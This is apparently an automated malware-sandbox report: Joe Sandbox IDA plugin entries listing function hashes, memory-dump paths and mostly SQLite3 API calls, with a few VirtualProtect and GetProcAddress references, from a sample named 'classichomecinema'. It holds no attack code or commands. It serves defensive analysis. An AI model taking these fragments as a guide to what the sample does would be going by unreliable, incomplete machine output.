                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                        • String ID: e
                                                                                        • API String ID: 786425071-4024072794
                                                                                        • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                        • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                        • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                        • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_exec
                                                                                        • String ID: sqlite_master$sqlite_temp_master$|
                                                                                        • API String ID: 2141490097-2247242311
                                                                                        • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                        • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                        • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                        • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                                        • String ID:
                                                                                        • API String ID: 3422960571-0
                                                                                        • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                        • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                                        • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                        • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                                        APIs
                                                                                          • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                        • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                          • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                          • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                          • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                          • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID:
                                                                                        • API String ID: 683514883-0
                                                                                        • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                        • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                        • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                        • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                        APIs
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 1903298374-0
                                                                                        • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                        • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                        • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                        • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                        APIs
                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                        • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                        • String ID:
                                                                                        • API String ID: 1894464702-0
                                                                                        • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                        • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                        • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                        • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                        APIs
                                                                                          • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                        • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                        • sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 3336957480-0
                                                                                        • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                        • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                        • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                        • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                        APIs
                                                                                        • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                        • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                        • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                        • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                        • String ID:
                                                                                        • API String ID: 3091402450-0
                                                                                        • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                        • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                        • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                        • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 251237202-0
                                                                                        • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                        • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                        • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                        • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                        APIs
                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                        • String ID:
                                                                                        • API String ID: 4225432645-0
                                                                                        • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                        • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                        • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                        • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                        • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 251237202-0
                                                                                        • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                        • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                                        • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                        • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: ($string or blob too big$|
                                                                                        • API String ID: 632333372-2398534278
                                                                                        • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                        • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                        • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                        • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                        APIs
                                                                                        • sqlite3_stricmp.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6094E8D4), ref: 60923675
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: BINARY
                                                                                        • API String ID: 912767213-907554435
                                                                                        • Opcode ID: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                                        • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                                                        • Opcode Fuzzy Hash: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                                        • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Protect$Query
                                                                                        • String ID: @
                                                                                        • API String ID: 3618607426-2766056989
                                                                                        • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                        • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                        • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                        • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                        • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                        • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                        • String ID: d
                                                                                        • API String ID: 211589378-2564639436
                                                                                        • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                        • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                        • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                        • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
